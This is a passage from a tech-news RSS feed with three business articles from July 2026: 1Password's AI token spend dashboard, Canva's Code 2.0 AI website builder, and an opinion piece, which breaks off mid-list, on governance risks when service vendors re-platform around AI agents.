justify AI investments without a clear view of what's actually driving costs."</p><p>The product, now in public preview with broad availability planned for fall 2026, connects directly to vendor admin APIs to pull token-level consumption data daily. It normalizes that data across providers into a single dashboard and allows organizations to set vendor-level spend limits, configure threshold-based alerts via Slack and email, and break down usage by team, user, vendor, and model.</p><div></div><h2><b>Why traditional software budgets can't keep up with AI token pricing</b></h2><p>The core challenge <a href="https://1password.com/">1Password</a> is targeting is structural. Traditional SaaS pricing operates on a per-seat, per-year model that is easy to budget and reconcile. AI pricing does not. Every API call to <a href="https://claude.ai/">Claude</a>, <a href="https://openai.com/index/gpt-5-6/">GPT-5.6</a>, or a <a href="https://cursor.com/docs/api">Cursor-powered coding assistant</a> consumes tokens, and the cost of those tokens varies by model, by input versus output, and by the complexity of the task. A single engineering team running agentic workflows can burn through a prepaid token budget in weeks — and the finance team may not notice until the invoice arrives.</p><p>Henry drew a sharp analogy to a problem enterprises have already lived through once. "Consumption-based pricing isn't new," he said. "We saw it arrive with cloud infrastructure, and it took years to build the tools and disciplines to manage it. AI is the next version of that shift."</p><p>That comparison resonates across the industry. When <a href="https://aws.amazon.com/">Amazon Web Services</a>, <a href="https://azure.microsoft.com/en-us">Microsoft Azure</a>, and <a href="https://cloud.google.com/">Google Cloud</a> popularized consumption-based pricing for compute and storage in the 2010s, enterprises initially lacked the tooling to monitor and optimize their cloud bills. That gap spawned an entire FinOps ecosystem — companies like CloudHealth, Spot.io, and Apptio built multi-billion-dollar businesses helping organizations understand what they were spending on cloud and why. Henry is explicitly betting that AI token spend will follow the same trajectory, and that organizations that fail to build visibility now will end up, as he put it, "paying far more than they needed to, for far longer than they should have."</p><p>The scale of the coming wave lends credibility to that bet. Goldman Sachs has estimated that token consumption from AI agents alone will grow 24 times by 2030, a projection driven by the expectation that autonomous AI systems will increasingly execute multi-step workflows — booking travel, writing and deploying code, managing customer service interactions — that generate vastly more API calls than a human sitting at a chat interface.</p><h2><b>How 1Password's new dashboard tracks every token across Anthropic, Cursor, and OpenAI</b></h2><p>The new capability extends <a href="https://1password.com/product/saas-manager">1Password SaaS Manager</a>'s existing foundation of application discovery, license management, and spend analytics. It is not a standalone product. Existing SaaS Manager customers can activate it by connecting their supported AI vendor API keys, at which point consumption data flows into a dedicated AI Consumption Management dashboard. Henry confirmed that there is no separate product or add-on fee: "AI Spend and Consumption Management is available to all 1Password SaaS Manager customers."</p><p>The system provides four core functions. First, it aggregates token usage and spend across Anthropic, Cursor, and OpenAI into a single, normalized view — eliminating the need to toggle between three separate vendor dashboards with three different reporting formats. Second, it enables budget controls: organizations can set vendor-level spend limits, configure percentage-based thresholds, and receive automated alerts when prepaid balances approach depletion. Third, it disaggregates consumption by team, user, vendor, and model, allowing finance and IT to understand not just how much is being spent, but where and by whom. Fourth, it situates AI spend within the broader SaaS portfolio, helping organizations see how token costs relate to their total software investment.</p><p>Notably, the system captures consumption regardless of whether a human or an AI agent generated it. "Token consumption is captured at the API level regardless of whether a human or an agent is generating it," Henry explained. "Organizations get the total consumption picture, including the spikes that agent loops can create, which can be some of the hardest usage to catch before it becomes a problem."</p><p>That agent-level visibility matters because autonomous AI systems can generate runaway costs in ways that human users typically cannot. An agentic coding assistant stuck in a retry loop, for example, can consume thousands of dollars in tokens in minutes — with no human in the loop to notice. For now, the product alerts but does not enforce. When asked whether 1Password will eventually give organizations the ability to automatically cut off spending when a threshold is crossed, Henry said the company is "actively evaluating" automatic enforcement but emphasized that visibility must come first: "You can't enforce what you can't see."</p><h2><b>The choice of launch partners reveals where enterprise AI budgets are under the most pressure</b></h2><p>The decision to start with <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a> — rather than casting a wider net — reflects where enterprise AI adoption and budget strain are most concentrated right now. Henry said the choice was driven entirely by customer demand. "Anthropic, Cursor, and OpenAI are where we're seeing the highest adoption, and where token consumption can move fast and get ahead of the teams responsible for managing it," he said. The company plans to add additional vendors based on customer demand, API availability, and budget impact, though it has not committed to a specific timeline or vendor list.</p><p>The inclusion of Cursor alongside the two major foundation model providers is telling. <a href="https://cursor.com/">Cursor</a>, an AI-powered code editor that has rapidly gained traction among developers, represents a category of AI tool where consumption is particularly difficult to forecast. Unlike a chatbot interface where a user consciously types a prompt, Cursor integrates AI suggestions directly into the development workflow, generating token consumption continuously as developers write code. That ambient, always-on consumption pattern makes it especially prone to budget overruns.</p><p>Henry also addressed who inside an organization should actually own this problem — and acknowledged that the honest answer right now is no one. "When spend is fragmented across vendor dashboards and finance teams are reconciling it monthly, you're always behind," he said. "AI spend can't be treated as a finance-only or IT-only problem." He noted that the pricing differences between models have become significant enough that the choice of which AI model a team uses is now a meaningful financial decision, one that is pulling CFOs into conversations with IT, product, and engineering leaders "in ways they never had to before."</p><p>Steve May, director of IT at ServiceTrade, a 1Password customer that has been using the capability, said it addressed a concrete planning gap. "Forecasting tools for AI consumption and spend was one of our biggest gaps in planning because we didn't have a reliable way to track it," May said. He added that the visibility has "prevented overages that would have cost far more to fix after the fact."</p><h2><b>Where 1Password fits in the fast-consolidating SaaS management market</b></h2><p>1Password is not the only company racing to solve the AI cost management problem, but the competitive landscape is still fragmented and the category is far from mature.</p><p><a href="https://zylo.com/">Zylo</a>, a SaaS management platform that Gartner has also recognized as a leader in the space, published its <a href="https://zylo.com/news/2026-saas-management-index">2026 SaaS Management Index</a> in January showing that AI-native application spend surged 393% year over year in organizations with more than 10,000 employees and 108% overall. Zylo's data also revealed that ChatGPT has become the most expensed application in enterprise environments, highlighting how AI tools are entering organizations through employee credit cards and expense reports — outside formal procurement and governance workflows. Zylo has added its own token-level cost tracking for AI vendors including Anthropic, OpenAI, Cursor, and Perplexity.</p><p>Meanwhile, according to a comparison published by <a href="https://coommit.com/blog/saas-management-platforms-2026-zylo-vs-vendr-vs-sastrify">Coommit</a> in May, <a href="https://www.vendr.com/">Vendr</a> — which focuses more on SaaS negotiation than discovery — tracks AI tools at the contract level but does not yet offer consumption-level visibility. And the FinOps Foundation reported in its 2026 State of FinOps survey that 98% of organizations now actively manage AI costs, up from just 31% in 2024. The broader SaaS management market is also consolidating rapidly. In May, Deel acquired Sastrify, a German SaaS management vendor, and began folding it into its HR platform — a signal that SaaS management capabilities are increasingly being absorbed into adjacent enterprise platforms rather than remaining standalone products.</p><p>1Password's approach differs from pure-play SaaS management competitors in one important respect: it is building AI cost management on top of an identity security platform, not a FinOps or procurement tool. The company's SaaS Manager product grew out of its 2025 acquisition of Trelica, a UK-based SaaS access management startup whose technology enabled the discovery of unsanctioned applications — so-called shadow IT. As BetaKit reported at the time of that deal, 1Password co-CEO Jeff Shiner described Trelica as "a pioneer in modern SaaS access management" and said the acquisition would accelerate 1Password's Extended Access Management product roadmap by more than a year. CRN noted that Trelica brought more than 300 SaaS integrations to the platform. That identity-first lineage gives 1Password a natural advantage in connecting spend data to specific users and teams — a linkage that matters when the question shifts from "how much are we spending on AI?" to "who is spending it, and is it delivering value?"</p><h2><b>From password manager to platform company: 1Password's $6.8 billion bet on enterprise identity</b></h2><p>The launch raises a question that Henry addressed head-on: whether a company that started as a consumer password manager can credibly compete in enterprise AI cost management.</p><p>"It doesn't feel like a stretch to us. It feels like a natural progression," he said. "For more than 20 years, 1Password has evolved alongside how our customers work. We started by protecting passwords. Then we helped organizations manage secrets, control access, and get visibility into the applications their teams rely on."</p><p>The company's evolution has been rapid. 1Password raised a $620 million Series C in January 2022 led by ICONIQ Growth, <a href="https://news.crunchbase.com/venture/1password-620m-round-cybersecurity-investor/">reaching a $6.8 billion valuation</a> — at the time, the largest funding round ever raised by a Canadian company, according to Crunchbase. The round also attracted celebrity investors including Ryan Reynolds, Scarlett Johansson, and Robert Downey Jr. As of early 2025, BetaKit reported that 1Password had surpassed $250 million in annual recurring revenue, with B2B sales accounting for nearly three-quarters of total revenue and the company claiming to be cash-flow positive.</p><p>In May 2024, 1Password launched <a href="https://1password.com/extended-access-management">Extended Access Management</a>, a platform designed to secure sign-ins across both managed and unmanaged applications and devices. That same year, it acquired Kolide for device trust and, in early 2025, Trelica for SaaS discovery. In June 2026, Gartner named 1Password a Leader in its Magic Quadrant for SaaS Management Platforms. According to 1Password's own blog post on the recognition, its SaaS Manager now supports over 400 integrations and provides visibility into a library of more than 40,000 pre-populated application profiles. Each step has moved the company further from its consumer roots and deeper into enterprise infrastructure. The AI Spend and Consumption Management launch extends that trajectory into financial operations territory — a domain where 1Password will compete not only with SaaS management vendors but potentially with dedicated FinOps platforms and the AI vendors' own billing dashboards.</p><h2><b>Why high AI token consumption doesn't always mean wasted money</b></h2><p>Perhaps the most revealing part of Henry's commentary concerns what organizations should actually do with the consumption data once they have it. He pushed back forcefully against the assumption that high token consumption automatically signals waste.</p><p>"A team burning through tokens may be building something genuinely valuable," he said. "A lower-usage project might not be moving the business forward at all. What matters is whether that consumption is producing enough business value to justify the spend."</p><p>Henry drew a distinction between personal productivity — "having a bot summarize your meeting or draft a quick email" — and genuine business outcomes. "What organizations need to see is where consumption is actually driving revenue, efficiency, or something that moves the needle."</p><p>That framing positions AI Spend and Consumption Management not just as a cost-cutting tool but as a decision-support system for AI investment allocation. If a CFO can see that one engineering team's heavy Claude usage is powering a product feature that drives revenue, while another team's OpenAI spend is funding low-value internal automation, the organization can reallocate budget accordingly rather than imposing across-the-board cuts.</p><p>"When costs rise faster than expected, the instinct is to cut," Henry said. "But most organizations can't yet tell which teams, models, or tools are responsible for the increase, so they end up cutting across the board rather than directing investment toward the AI projects that are actually delivering business value. Blunt cuts on a technology you're counting on for competitive advantage is not a management strategy, it's a missed opportunity."</p><h2><b>The next enterprise budget crisis is already here — and it's priced per token</b></h2><p>The product's current scope — three vendor integrations, alerting but not enforcement — is clearly a starting point. Henry signaled that automatic spend limits are on the roadmap and that additional vendor integrations will follow based on customer demand.</p><p>But the broader trajectory he described suggests 1Password sees this launch as a wedge into a much larger opportunity. "As traditional SaaS products add AI capabilities, their pricing models are going to follow," he said. "Organizations that build visibility and management discipline around consumption now are going to be in a much better position when that happens across the rest of their software portfolio."</p><p>If Henry is right, the chaos currently confined to AI token budgets is not a temporary growing pain but a preview of how all enterprise software will eventually be priced. A decade ago, companies scrambled to understand their cloud bills. Today, they are scrambling to understand their AI bills. The question is whether the organizations building the dashboards this time around can get ahead of the curve — or whether, as Henry warned, they will end up where so many companies ended up with cloud, realizing too late how much they were overpaying, and for how long.</p><p>AI Spend and Consumption Management is <a href="https://1password.com/lp/saas-manager">available now in public preview</a> for 1Password SaaS Manager customers. Broad availability is planned for fall 2026.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Canva launches Code 2.0, offering AI website building to every user — including free accounts]]></title>
<description><![CDATA[Canva on Tuesday launched Canva Code 2.0, a major upgrade to its AI-powered coding tool that lets users build interactive websites, apps, and experiences using plain-language prompts — and then edit the results as easily as tweaking a Canva presentation. The feature is now available to all of the...]]></description>
<link>https://tsecurity.de/de/3668119/it-nachrichten/canva-launches-code-20-offering-ai-website-building-to-every-user-including-free-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668119/it-nachrichten/canva-launches-code-20-offering-ai-website-building-to-every-user-including-free-accounts/</guid>
<pubDate>Tue, 14 Jul 2026 15:32:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.canva.com/">Canva</a> on Tuesday launched <a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a>, a major upgrade to its AI-powered coding tool that lets users build interactive websites, apps, and experiences using plain-language prompts — and then edit the results as easily as tweaking a Canva presentation. The feature is now available to all of the company's more than 265 million monthly users across every pricing tier, including free accounts.</p><p>The move is Canva's most aggressive push yet into the fast-growing "vibe coding" market, a category that barely existed 18 months ago but has already minted billion-dollar startups and reshaped how non-developers think about building software. But where rivals like <a href="https://lovable.dev/">Lovable</a>, <a href="https://replit.com/">Replit</a>, and <a href="https://bolt.new/">Bolt.new</a> have focused primarily on generating functional code from text prompts, Canva is making a different bet: that the real bottleneck isn't creating the code — it's making the output actually look good.</p><p>"Most vibe coding tools stop at functional — generating output that looks the same as everyone else's," Canva states in its announcement. "You might get a working prototype, but making it actually look like yours requires a complex editing surface, a separate design tool, a developer, or endless back-and-forth prompting that rarely lands where you want it.”</p><p>Danny Wu, Canva's Head of AI Products, framed the product's positioning in stark terms during an exclusive interview with VentureBeat ahead of the launch.</p><p>"We are deliberately targeting non-technical users," Wu said. "Canva Code isn't a tool we're building for developers. What we're trying to do is bring the power of AI coding — and really lightweight coding — into the Canva platform, while answering our users' requests for more interactivity, more customization, and more flexibility, from websites to interactive presentations."</p><h3><b>Canva Code 2.0 brings drag-and-drop editing, HTML import, and 75% faster generation to AI-built websites</b></h3><p>The update introduces several capabilities designed to collapse the distance between generating code and publishing a polished interactive experience. Users can now create Canva Code projects directly inside other design projects — embedding interactive elements within a whiteboard, presentation deck, or standalone page. <a href="https://www.canva.com/">Canva</a> has also added more than 50 new templates specifically designed for interactive designs, along with the ability to import raw HTML files from other AI coding tools and convert them into editable Canva designs.</p><p>The performance improvements are significant. Canva says it has reduced average code generation time by 75 percent and cut the median time from initial prompt to a published site by 30 percent. The company also reports that integrating <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> into the broader Canva editor — allowing users to treat coded outputs like any other design element — has increased active Code users by 25 percent.</p><p>Perhaps the most distinctive feature is the editing experience itself. Unlike most AI coding platforms, which require users to re-prompt or modify raw code to make visual changes, <a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a> lets users click directly into generated elements to change text, drag and drop images from Canva's built-in library of over 120 million templates and assets, update colors and fonts through a familiar toolbar, or select a specific element and refine it through conversational AI. Every output is fully interactive and automatically adapts to different screen sizes, with a built-in mobile preview.</p><p>Wu demonstrated the drag-and-drop editing during the interview, showing how a generated conference website could be modified in real time — swapping in photos, changing fonts to branded alternatives, and editing text directly on the canvas. "The key differentiator with Canva Code is the editability and the kindness of the outputs it generates," he said, though he noted one current limitation: "We don't support moving elements around. You still have to re-prompt for that."</p><h3><b>How Canva plans to compete with Lovable, Replit, and Bolt in the booming AI app builder market</b></h3><p>Canva's entry into vibe coding at this scale arrives at a pivotal moment for the category. According to <a href="https://www.useluminix.com/reports/industry-analysis/vibe-coding-tool-landscape-replit-v0-base44-bolt-lovable-vercel/source/0">market research published by Luminix AI in May 2026</a>, the vibe coding and AI app builder market has reached an estimated $4.7 billion in 2026, with projections pointing toward $12.3 billion by 2027 at roughly 38 percent compound annual growth. The research also estimates that AI-generated code now comprises approximately 41 percent of all code written globally — a figure that would have seemed inconceivable even two years ago.</p><p>The competitive landscape has grown ferocious. <a href="https://lovable.dev/dashboard">Lovable</a>, which focuses on conversational, design-forward app generation for non-technical founders, has achieved what may be the fastest revenue ramp in the category's history — reportedly reaching approximately $400 million in annual recurring revenue by early 2026, according to Luminix's analysis. <a href="https://replit.com/">Replit</a>, which transformed its browser-based IDE into a full vibe-coding engine through successive AI agent releases, has tripled its valuation to $9 billion and is targeting $1 billion in run-rate revenue by the end of 2026, per the same report. <a href="https://bolt.new/">Bolt.new</a>, which runs a full Node.js environment entirely in the browser, scaled from $4 million to $40 million in ARR within months of launching.</p><p>And then there is Canva, which brings something none of those platforms possess: a quarter-billion-user design ecosystem where brands, teams, and individuals already store their visual identities, collaborate on projects, and publish content.</p><p>Wu positioned <a href="https://bolt.new/">Canva Code</a> not as a direct competitor to these developer-focused tools but as something that fills a gap none of them have addressed. "A lot of the requests that we have been getting and the usage we're seeing is actually with using Canva Code not necessarily as just one artifact, but as part of an overall design, the visual communication they're trying to tell," Wu said. "Like when you have a sales deck, you're able to add a calculator, you're able to add a visualizer of what exactly your product does. That's something where an interactive slide can be worth a thousand pictures."</p><h3><b>Why Canva's HTML import feature could turn it into a 'finishing layer' for every AI coding tool</b></h3><p>One of the most strategically interesting features in <a href="https://bolt.new/">Canva Code 2.0</a> is its HTML import capability, which allows users to take code generated by any AI tool — including <a href="https://chatgpt.com/">ChatGPT</a>, <a href="http://claude.ai/">Claude</a>, <a href="https://lovable.dev/dashboard">Lovable</a>, or <a href="https://bolt.new/">Bolt</a> — and bring it into Canva as a fully editable design. The implication is unmistakable: Canva is positioning itself as the place where AI-generated code gets its finishing touches, regardless of where it was originally created.</p><p>When asked directly whether this amounts to positioning Canva as a "finishing layer on top of vibe coding," Wu offered a diplomatic but revealing response. "It's really a continuation of our goal to make all design as easy as possible," he said. "We've supported importing PDFs and translating them into docs, importing PowerPoint files — so in one way, it's an expansion of that. But in another way, it's really just listening to what our users want and making Canva both the most useful and the most compatible platform.”</p><p>He paused, then added: "It's not that we're deliberately positioning ourselves as a specific layer, say like a finishing layer after vibe coding. We just really want to make our platform the most accessible and the most pluggable."</p><p>That language — "most pluggable" — suggests a platform strategy that doesn't require Canva to win the AI code generation race outright. If Canva becomes the default destination for making AI-generated code look professional and on-brand, it captures value from the entire category regardless of which code generation engine users prefer. The strategy also echoes the broader import capabilities that already allow Canva to ingest PowerPoint decks and PDFs from competing platforms, gradually pulling users deeper into the Canva ecosystem without demanding they abandon existing workflows.</p><h3><b>What Canva Code can build — and where Danny Wu says it hits its limits</b></h3><p>Wu was notably candid about the product's boundaries — a refreshing departure from the typical Silicon Valley product launch. "Canva Code is great for anything that works as a front-end app, and it's especially good when you want to leverage data, data submissions, and interactivity at small to medium scale," he said. "I'll be honest about the limitations. Canva Code is probably not going to be suitable if you're trying to build a website with complex backends, or if you're handling hundreds of thousands of visitors per day."</p><p>This candor effectively draws a line between <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> and the more ambitious platforms in the space. While Lovable and Replit are pushing toward full-stack application development — complete with databases, authentication, and production-grade hosting — Canva is deliberately limiting its scope to interactive front-end experiences at modest scale. The question is whether that's a strategic weakness or a disciplined focus. For the teachers, small business owners, and marketing teams that make up the bulk of Canva's user base, complex backends and high-traffic scalability are irrelevant concerns. What matters is whether they can create an interactive event page, a property listing website, or a classroom hub that looks professional and works on mobile — without hiring a developer or learning a new tool.</p><p>When asked about the AI models powering <a href="https://www.canva.com/ai-code-generator/">Canva Code</a>, Wu confirmed the company uses a combination of proprietary and third-party models, including those from OpenAI and Anthropic, but declined to specify the exact mix. "We don't share the exact mix, and it does change over time," he said. "We also route differently depending on what you're asking for and which model family we think is best for handling certain requests."</p><h3><b>Canva's AI acquisition spree — from Affinity to Leonardo.ai — now powers its vibe coding push</b></h3><p>Canva's broader AI infrastructure has been significantly bolstered by an acquisition strategy that has accelerated over the past two years. In March 2024, <a href="https://www.canva.com/newsroom/news/affinity/">the company acquired Affinity</a>, the British creative software suite popular with Mac users, in a deal that Bloomberg reported was valued at "<a href="https://www.bloomberg.com/news/articles/2024-03-26/canva-acquires-affinity-design-suite-in-push-to-rival-adobe">several hundred million pounds</a>." Canva at the time positioned the deal as a way to compete with Adobe's flagship products — Illustrator, Photoshop, and InDesign — by gaining ownership of Affinity's Designer, Photo, and Publisher applications.</p><p>Just four months later, Canva acquired <a href="http://leonardo.ai/">Leonardo.ai</a>, an Australian generative AI startup with over 19 million registered users and more than a billion images generated. Canva co-founder Cameron Adams said at the time that Leonardo.ai's technology would be integrated into Canva's Magic Studio generative AI suite.</p><p>Together with these acquisitions, <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> is the company's attempt to layer interactive, code-driven capabilities on top of a visual design platform that has already been enhanced by professional-grade design tools and generative AI models. The company reports over 32 billion uses of its AI products to date — a staggering figure that underscores how deeply AI is now woven into everyday Canva workflows, even for users who may not think of themselves as using artificial intelligence.</p><h3><b>Six million sites published, but Canva's retention data remains an open question</b></h3><p>Canva's announcement highlights an impressive traction metric: users have created and published more than six million websites using Canva Code since the feature was first introduced a year ago. But the number deserves scrutiny.</p><p>Wu clarified in the interview that the six million figure represents published websites over the past year — meaning sites that were either made public or shared via password-protected or private links. "They may have published publicly, or behind a password, or as a private link. But that's the number of published websites," he said.</p><p>When asked about active retention — how many of those sites are still live and being maintained — Wu acknowledged the gap in his data. This is a meaningful distinction. In the vibe coding market, raw creation numbers can be misleading because the barrier to generating a site is so low. The more telling metric — which Canva does not yet provide — would be how many of those six million sites receive regular traffic or have been updated after initial publication.</p><p>The early use cases, however, suggest genuine utility beyond novelty. Educators and school administrators are using Canva Code to build classroom hubs, with one teacher creating bespoke webpages for each of their classrooms to keep students and parents updated on announcements. Small businesses, like Alt Marketing School, have built mini apps for fundraising training and interactive roadmaps for their members. For World Book Day, 50 readers created educational games across different subjects, complete with pedagogical guides for classroom use.</p><h3><b>Canva Code pricing, data governance, and what enterprise customers need to know</b></h3><p><a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a> is available across all of Canva's pricing tiers, including its free plan — a notable decision given that competitors like Lovable, Bolt, and Replit reserve their most capable features for paid subscribers. "As you go from, say, free to pro to business to enterprise, you would get more AI credits and be able to have higher usage of Canva Code," Wu said. "But it is available and it is usable — even free Canva accounts as well as education and not-for-profit accounts."</p><p>This credit-based approach mirrors the pricing evolution happening across the entire vibe coding category, where platforms have converged on token or credit systems that meter AI generation capacity rather than gating features behind subscription tiers. The difference is that Canva's free tier serves as an acquisition funnel for a much larger design platform, not just for the coding feature itself.</p><p>For the institutional customers Canva increasingly courts — school districts, real estate brokerages, enterprise marketing teams — data governance is a threshold concern. Wu addressed this directly. "All users and customers have full control over how their data is used," he said. "They can choose whether their prompts and data are used for AI training in the settings. For businesses and enterprises, team admins can manage this at the organizational level and guarantee that their inputs, content, and outputs won't be used for training." This opt-out approach reflects a lesson the broader industry has learned the hard way. As The Verge reported when Canva acquired Leonardo.ai, Adobe suffered significant backlash over a policy update regarding user data and AI model training — a controversy Canva appears keen to avoid.</p><h3><b>Canva's long-term vision: closing the gap between imagination and what non-technical users can actually build</b></h3><p>When asked where <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> fits into the company's long-term trajectory — and whether Canva is building toward a full-stack app development platform — Wu steered the conversation back to the company's core audience.</p><p>"A huge part of it is reducing the gap between your imagination and what's possible, especially for everyday users — people who don't have a lot of time," he said. "They don't have time to figure out deploys or MCPs or APIs. They just want to design more interactive and more dynamic communication."</p><p>He pointed to the rapid improvement in AI model capabilities as a key accelerant. "The kind of things you can create today in one shot — like a 3D visualization of a solar system — you really couldn't have trusted the output a year ago. But today, you have a really high success rate."</p><p>Whether <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> becomes a durable product category or a feature that gets absorbed into the platform's broader AI workflow will depend on how quickly the company can close the gap between its current front-end focus and the full-stack capabilities that increasingly define the competition. Lovable is shipping Supabase-backed apps with authentication and databases built in. Replit's agents can execute autonomous long-running builds. Bolt.new runs entire Node.js environments in a browser tab. These are fundamentally different ambitions than making a conference landing page look good.</p><p>But Canva has never won by matching the technical depth of its competitors. A decade ago, it didn't try to out-feature Adobe — it made design accessible to the 99 percent of people who would never open Photoshop. Now, in a vibe coding market where every tool can generate a working prototype from a prompt, Canva is making the same wager it made in 2012: that for most people, the hardest part was never the building. It was making it look like it came from you.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your service vendors are being rebuilt around AI]]></title>
<description><![CDATA[Venture-backed firms are buying up the support, finance-ops and managed-services providers enterprises rely on and re-platforming them around AI agents — and the renewal that follows arrives priced per outcome, sold as your advantage. The acquisition-built structure and unproven stability create ...]]></description>
<link>https://tsecurity.de/de/3667858/it-nachrichten/your-service-vendors-are-being-rebuilt-around-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667858/it-nachrichten/your-service-vendors-are-being-rebuilt-around-ai/</guid>
<pubDate>Tue, 14 Jul 2026 14:02:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Venture-backed firms are buying up the support, finance-ops and managed-services providers enterprises rely on and re-platforming them around AI agents — and the renewal that follows arrives priced per outcome, sold as your advantage. The acquisition-built structure and unproven stability create governance and continuity risks your vendor process isn’t sized for. Here’s how to keep the leverage on your side of the table.</p>



<p class="wp-block-paragraph">The first time an AI-native services pitch crossed my desk, I nearly signed it. The savings were real, the agents demoed cleanly and the pricing was the kind procurement loves — per resolved case, not per seat. What I almost missed was who got to define the word “resolved.” On an earlier outsourced-support arrangement, back in my public-sector days, the vendor’s reported resolution rate looked excellent right up until we pulled the reopen numbers ourselves. Auto-closed tickets had been counted as wins. Users had quietly stopped logging issues at all. The dashboard was green; the service was not.</p>



<p class="wp-block-paragraph">That gap — between the number on the contract and what your users actually live with — is the whole game now, and it is about to scale across your portfolio. <a href="https://www.gartner.com/en/articles/hype-cycle-for-agentic-ai">Gartner’s 2026 CIO and Technology Executive Survey found only 17% of organizations have deployed AI agents, but more than 60% expect to within two years</a> — the steepest adoption curve of any emerging technology it tracks. The providers running your services are moving first, and the contracts are changing faster than most of us can govern them.</p>



<p class="wp-block-paragraph">The agents underneath these pitches are also nowhere near as reliable in production as they look in the room. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner expects more than 40% of agentic AI projects to be canceled by the end of 2027</a> on cost, unclear value and weak risk controls, and reckons only about 130 of the thousands of self-described agentic vendors are the real thing — the rest are “agent washing” old chatbots and RPA. Treat any headline resolution rate the way you treat a vendor’s own uptime stats: Marketing, until you have seen it run on accounts like yours.</p>



<h2 class="wp-block-heading">What’s behind the pitch</h2>



<p class="wp-block-paragraph">The challenger’s economics aren’t magic. They come from a reshaping of the services market: Venture-backed firms buying up fragmented, labor-heavy providers — support desks, contact centers, AP and finance ops, slices of managed IT — and re-platforming them around agents. Many of the companies pitching you are not one company at all but several acquired shops stitched onto a shared AI layer. That barely comes up in the sales meeting. It matters enormously once you are the customer.</p>



<p class="wp-block-paragraph">The direction is independently corroborated, not vendor hype. <a href="https://www.everestgrp.com/blogs/outcome-based-metrics-the-new-value-currency-in-bpo/">Everest Group reports outcome-based pricing in business-process services moving from pilots to scaled adoption</a> as AI makes outcomes measurable enough to contract on, with the binding constraint now governance and verified baselines. <a href="https://www.ey.com/content/dam/ey-unified-site/ey-com/en-gl/about-us/analyst-relations/documents/ey-gl-hfs-horizons-agentic-services-2026-ey-excerpt-04-2026.pdf">HFS Research tracks the same “services-to-software” shift</a> across consulting, IT, and operations providers. Here is the part worth holding onto: Most enterprises are early, so you have a little time. But the first vendors to reprice you this way will be the small, single-source ones in the long tail of your portfolio — which, if your stack looks anything like mine, is most of it.</p>



<h2 class="wp-block-heading">Don’t assume the incumbent is the safe choice</h2>



<p class="wp-block-paragraph">And don’t kid yourself that renewing with the familiar name keeps you clear of this. The big integrators are pulling labor out of their own delivery just as fast — <a href="https://news.outsourceaccelerator.com/it-services-firms-add-thousands/">Accenture cut tens of thousands of roles and rehired against an AI-skills filter</a> — and rewriting deals around a share of savings instead of time and materials. Outcome pricing is becoming the default everywhere. There is no version of this where you sit it out.</p>



<h2 class="wp-block-heading">Two risks your vendor process won’t catch</h2>



<p class="wp-block-paragraph">The first is governance, and the roll-up structure makes it worse than the usual AI-vendor worry. The company you are contracting with isn’t one system. It is several acquired firms with different data practices and security postures, with an AI layer dropped on top at speed. Your customer records, invoices and support transcripts flow into agents whose decisions you often can’t trace, across entities that were never built to one standard. The numbers here aren’t comforting: <a href="https://www.ibm.com/reports/data-breach">IBM’s 2025 Cost of a Data Breach Report found 63% of breached organizations had no AI governance policy at all, and 97% of those that suffered an AI-related breach lacked basic AI access controls</a> — AI adoption, IBM concluded, is outpacing both security and governance. When an agent botches a dispute or misroutes regulated data, the regulator and the customer come looking for you, not the platform. And here is the organizational trap: The savings line is what your CFO signs; the provenance question is the one your audit committee won’t ask until after the incident. Nobody raises it for you.</p>



<p class="wp-block-paragraph">The second is whether the provider will still be standing in three years. These platforms are new, built by acquisition, venture-funded and not one has run through a full contract term or a real downturn. With <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner expecting more than 40% of agentic AI projects to be canceled by 2027</a>, putting core operations on a young, agent-dependent vendor is a single point of failure dressed up as innovation. Write the exit and data-portability terms before you sign — while you still have leverage to.</p>



<h2 class="wp-block-heading">Six questions for the renewal</h2>



<p class="wp-block-paragraph">When the challenger shows up — or your incumbent reprices to match — these are the questions I would put on the table. They come down to one thing: Making sure you, not the vendor, own the number.</p>



<ol start="1" class="wp-block-list">
<li><strong>Definition, baseline, guardrails. </strong>Make “resolved” mean what your users experience, measured against a baseline you have captured yourself, and tie it to metrics you own — first-contact resolution, reopen rate, time-to-resolution. Expect procurement to resist because pinning this down slows the deal. Hold the line; it is the whole ballgame.</li>



<li><strong>Real agent, or agent washing. </strong>Gartner reckons only a sliver of self-described agentic vendors are the genuine article. Make them prove it: Production resolution on accounts like yours, and the human-escalation rate sitting behind that number. Not a demo.</li>



<li><strong>Auditability, as a gate. </strong>SOC 2 at minimum, increasingly ISO 42001 or NIST AI RMF alignment, plus model cards, decision logs and an incident-response plan they have actually tested. If they can’t show how data is walled off between their acquired entities, or how an agent’s decision gets traced, they aren’t ready for anything regulated. This belongs in the shortlist criteria, not the post-mortem.</li>



<li><strong>Where autonomy stops. </strong>Decide which actions an agent can take alone and which need a human, how it hands off with context and who is accountable when it acts on its own. Put names against it before go-live.</li>



